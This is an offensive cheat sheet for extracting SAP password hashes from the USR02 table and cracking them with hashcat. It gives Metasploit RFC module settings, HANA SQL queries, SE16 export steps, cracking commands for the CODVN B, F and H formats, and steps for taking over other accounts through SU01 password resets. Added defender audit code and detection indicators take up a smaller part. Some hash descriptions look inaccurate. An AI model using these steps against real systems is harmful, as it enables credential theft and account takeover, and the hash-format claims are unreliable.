SAP Password Cracking

SAP stores password hashes in the USR02 database table. This note covers how to extract them and crack them efficiently with hashcat. Start with CODVN B — it's the weakest and most likely to yield results fast.


Hash Types — CODVN Reference

SAP uses multiple password hash algorithms in parallel, controlled by the CODVN field in USR02.

CODVN  Column in USR02  Algorithm                  Max length   Notes
B      BCODE            MD5 (DES-based variant)    8 chars      Uppercase only — trivially crackable
D      BCODE            Same as B, different salt  8 chars
F      PASSCODE         SHA-1 based                Full length  Stronger — but still worth cracking
G      Multi-column     SHA-256                    Full length
H      PWDSALTEDHASH    SHA-256 + PBKDF2           Full length  Strongest — focus on B/F first
I      Multi-column     Multiple simultaneous      Full length  All hashes stored

Key insight: SAP generates and stores all applicable hash types simultaneously when a password is set. If the system parameter login/password_downwards_compatibility is enabled, even complex modern passwords generate a weak CODVN B hash. Crack B first — it gives you the uppercase version of the password which you can use to build a targeted wordlist for H.
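As an added defender-side audit (not part of the original note): a Python pass over a USR02 export that flags every account still carrying a CODVN B hash, and in particular B stored next to H on the same account, which is the downwards-compatibility symptom described above. The CSV sample is constructed; the column names follow USR02, the helper names are assumptions.

```python
import csv
import io
from dataclasses import dataclass

# Constructed USR02 export (sample values, not from any real system). BCODE holds
# the CODVN B hash, PASSCODE the CODVN F hash, PWDSALTEDHASH the CODVN H hash.
SAMPLE_USR02 = """\
MANDT,BNAME,CODVN,BCODE,PASSCODE,PWDSALTEDHASH
000,ADMIN,I,1F2A3B4C5D6E7F8A,AABBCCDD11223344AABBCCDD11223344AABBCCDD,"{x-issha, 1024}c2FtcGxlLW9ubHk="
000,BASIS,B,AABBCCDD11223344,,
000,SVC_RFC,G,0102030405060708,0102030405060708090A0B0C0D0E0F1011121314,
000,DEVUSER,H,0000000000000000,,"{x-issha, 1024}YW5vdGhlci1zYW1wbGU="
"""
ZERO_BCODE = "0000000000000000"  # all-zero BCODE: no CODVN B hash stored

@dataclass
class Exposure:
    user: str
    codvn: str
    has_b_hash: bool  # 8-char uppercase hash, the mode 7700 target
    has_f_hash: bool
    has_h_hash: bool

    @property
    def legacy_only(self) -> bool:
        # Nothing but the B hash: the whole password is exposed at B strength.
        return self.has_b_hash and not (self.has_f_hash or self.has_h_hash)

def assess(csv_text: str) -> list:
    # Classify each USR02 row by which hash columns are populated.
    rows = []
    for r in csv.DictReader(io.StringIO(csv_text)):
        bcode = r["BCODE"].strip()
        rows.append(Exposure(
            user=r["BNAME"], codvn=r["CODVN"],
            has_b_hash=bool(bcode) and bcode != ZERO_BCODE,
            has_f_hash=bool(r["PASSCODE"].strip()),
            has_h_hash=r["PWDSALTEDHASH"].strip().startswith("{x-issha"),
        ))
    return rows

def summary(csv_text: str) -> dict:
    # Roll-up for the admin: who still carries a crackable B hash.
    ex = assess(csv_text)
    return {
        "users": len(ex),
        "with_b_hash": sorted(e.user for e in ex if e.has_b_hash),
        "legacy_only": sorted(e.user for e in ex if e.legacy_only),
        # B stored next to H on one account is the downwards-compatibility symptom
        "b_next_to_h": sorted(e.user for e in ex if e.has_b_hash and e.has_h_hash),
    }
```

Accounts listed under b_next_to_h are the ones to re-hash after disabling login/password_downwards_compatibility; legacy_only accounts need a password change to get a modern hash at all.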


Step 1 — Extract Hashes from USR02

Method A: Metasploit RFC Module (Preferred)

This module uses RFC_ABAP_INSTALL_AND_RUN to run native SQL, extracting full raw hash values (bypasses the RFC_READ_TABLE truncation issue).

msf > use auxiliary/scanner/sap/sap_rfc_usr02
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > run

# Output saved to: ~/.msf4/loot/<date>_sap_usr02_*.txt

Method B: Direct HANA SQL (If DB Access Available)

# Connect to SAP HANA
hdbsql -n <host>:30015 -u <dbuser> -p <dbpass>

# Extract all non-empty hashes (HANA writes binary literals as X'...', not 0x...)
hdbsql -n localhost -U DEFAULT \
  "SELECT MANDT,BNAME,BCODE,GLTGB,PWDSTATE,PASSCODE,PWDSALTEDHASH \
   FROM USR02 WHERE BCODE != X'0000000000000000'"

# For Oracle/MSSQL backends — same query via DB admin access

Method C: RFC_READ_TABLE (Partial — BCODE Only)

RFC_READ_TABLE truncates RAW fields — you'll only get the first half of BCODE. Useful for CODVN B partial attacks (hashcat modes 7701/7801).

msf > use auxiliary/scanner/sap/sap_rfc_read_table
msf > set RHOSTS <target>
msf > set RPORT 3300
msf > set CLIENT 000
msf > set USERNAME <user>
msf > set PASSWORD <pass>
msf > set QUERY "SELECT MANDT,BNAME,BCODE,PASSCODE FROM USR02"
msf > run

Method D: Transaction SE16 / SE16N (Inside SAP GUI)

If you have access to the SAP GUI with any account that can open SE16:

Transaction: SE16
Table: USR02
Fields: MANDT, BNAME, BCODE, PASSCODE, PWDSALTEDHASH
Execute -> Export as local file

Step 2 — Prepare Hash Files

CODVN B and F Format

# Format: <username>$<hash>
ADMIN$1F2A3B4C5D6E7F8A
BASIS$AABBCCDD11223344

CODVN H Format

# Format: hash only (no username prefix)
{x-issha, 1024}<base64-encoded-hash>

Step 3 — Crack with Hashcat

Wordlist Attack (Simplest — Try First)

# CODVN B — full hash
hashcat -a 0 -m 7700 hashes_b.txt /usr/share/wordlists/rockyou.txt

# CODVN F — full hash
hashcat -a 0 -m 7800 hashes_f.txt /usr/share/wordlists/rockyou.txt

# CODVN H — PBKDF2-SHA256
hashcat -a 0 -m 10300 hashes_h.txt /usr/share/wordlists/rockyou.txt

Partial Hash Attack (RFC_READ_TABLE truncated output)

# CODVN B — partial (first half only)
hashcat -a 0 -m 7701 partial_hashes_b.txt /usr/share/wordlists/rockyou.txt

# CODVN F — partial
hashcat -a 0 -m 7801 partial_hashes_f.txt /usr/share/wordlists/rockyou.txt

Rule-Based Attack

# Add rules to the wordlist for password mutations
hashcat -a 0 -m 7700 hashes_b.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -a 0 -m 7800 hashes_f.txt rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule

Brute Force (CODVN B — Max 8 Chars, Uppercase)

# CODVN B: up to 8 characters, uppercase letters only
hashcat -a 3 -m 7700 hashes_b.txt '?u?u?u?u?u?u?u?u'

# Mixed charset: 3 uppercase letters followed by 5 digits
hashcat -a 3 -m 7700 hashes_b.txt '?u?u?u?d?d?d?d?d'

Hashcat Mode Reference

Mode   Hash type               Notes
7700   SAP CODVN B (full)      MD5-based, 8 char max, uppercase
7701   SAP CODVN B (partial)   From RFC_READ_TABLE truncated output
7800   SAP CODVN F (full)      SHA-1 based
7801   SAP CODVN F (partial)   From RFC_READ_TABLE truncated output
10300  SAP CODVN H             PBKDF2-SHA256, strongest

Step 4 — Use Cracked Credentials

CODVN B Output Is Uppercase

CODVN B hashes store passwords in uppercase. The cracked result will be uppercase — use it to reconstruct the real password:

Cracked CODVN B: PASSWORD123
Real password options: Password123 / password123 / Password1234 / etc.

Build a case-mutation wordlist (hashcat --stdout reads a wordlist, so feed the cracked value on stdin):

echo PASSWORD123 | hashcat --stdout -r toggles.rule > mutations.txt
hashcat -a 0 -m 7800 hashes_f.txt mutations.txt

Log In and Check Permissions

# Test credentials via RFC
msf > use auxiliary/scanner/sap/sap_rfc_bruteforce
msf > set USERNAME <cracked_user>
msf > set PASSWORD <cracked_pass>
msf > run

# Or via SAP GUI (saplogon) with system ID, host, port 3200

Escalate via Password Reset (If Auth Object Present)

If your user has S_USER_GRP with ACTVT=22 (change password):

Transaction: SU01
-> Open any user
-> Change password -> set known value
-> Log in as that user

Detection Indicators

Watch for these in SAP Security Audit Log (transaction SM20):

  • Multiple failed logon attempts (brute force)
  • RFC calls to RFC_READ_TABLE targeting USR02/USH02
  • RFC_ABAP_INSTALL_AND_RUN calls from unusual sources
  • Login with SAP* or DDIC accounts after long dormancy
  • Logon from unexpected IP ranges
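An added detection example, not from the original note: the indicators above expressed as rules over constructed audit events. The record layout (ts, user, src, event, detail), the trusted network and the RFC_ABAP_INSTALL_AND_RUN allow-list are assumptions for this example; a real deployment maps the SM20 export columns onto them. The dormancy indicator needs last-logon history and is not modelled here.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit events (sample data, not real SM20 output). The record layout
# (ts, user, src, event, detail) is an assumption for this example.
def ev(ts, user, src, event, detail=""):
    return {"ts": ts, "user": user, "src": src, "event": event, "detail": detail}

EVENTS = [
    ev("2024-05-01T08:00:01", "RFCUSER", "10.0.5.20", "RFC_CALL", "RFC_READ_TABLE SELECT MANDT,BNAME,BCODE FROM USR02"),
    ev("2024-05-01T08:00:07", "RFCUSER", "10.0.5.20", "RFC_CALL", "RFC_ABAP_INSTALL_AND_RUN"),
    *[ev(f"2024-05-01T08:0{i}:00", "JSMITH", "10.0.9.4", "LOGON_FAILED") for i in range(1, 6)],
    ev("2024-05-01T09:30:00", "DDIC", "203.0.113.7", "LOGON_OK"),
    ev("2024-05-01T09:45:00", "JSMITH", "10.0.9.4", "LOGON_OK"),
]
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: corporate range
INSTALL_RUN_ALLOWED = {"10.0.1.1"}  # assumption: the one host allowed to call it

def detect(events, fail_threshold=5, window=timedelta(minutes=10)):
    """Map the SM20 indicators listed above onto (rule, user, src) alerts."""
    alerts, fails = [], defaultdict(list)
    for e in events:
        ts, d = datetime.fromisoformat(e["ts"]), e["detail"].upper()
        if e["event"] == "RFC_CALL":
            if "RFC_READ_TABLE" in d and ("USR02" in d or "USH02" in d):
                alerts.append(("hash_table_read", e["user"], e["src"]))
            if "RFC_ABAP_INSTALL_AND_RUN" in d and e["src"] not in INSTALL_RUN_ALLOWED:
                alerts.append(("abap_install_and_run", e["user"], e["src"]))
        elif e["event"] == "LOGON_FAILED":
            # keep only failures inside the sliding window; fire once when it fills
            fails[e["user"]] = [t for t in fails[e["user"]] if ts - t <= window] + [ts]
            if len(fails[e["user"]]) == fail_threshold:
                alerts.append(("logon_burst", e["user"], e["src"]))
        elif e["event"] == "LOGON_OK":
            if e["user"] in ("SAP*", "DDIC"):
                alerts.append(("default_account_logon", e["user"], e["src"]))
            if not any(ipaddress.ip_address(e["src"]) in n for n in TRUSTED_NETS):
                alerts.append(("untrusted_source_logon", e["user"], e["src"]))
    return alerts
```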

Quick Command Index

Goal                      Command
Extract hashes via RFC    msf > use auxiliary/scanner/sap/sap_rfc_usr02
Extract partial hashes    msf > use auxiliary/scanner/sap/sap_rfc_read_table
Crack CODVN B (full)      hashcat -a 0 -m 7700 hashes.txt wordlist.txt
Crack CODVN B (partial)   hashcat -a 0 -m 7701 hashes.txt wordlist.txt
Crack CODVN F (full)      hashcat -a 0 -m 7800 hashes.txt wordlist.txt
Crack CODVN F (partial)   hashcat -a 0 -m 7801 hashes.txt wordlist.txt
Crack CODVN H             hashcat -a 0 -m 10300 hashes.txt wordlist.txt
Direct HANA query         hdbsql -n localhost -U DEFAULT "SELECT ... FROM USR02"
In-SAP table browse       SE16 -> USR02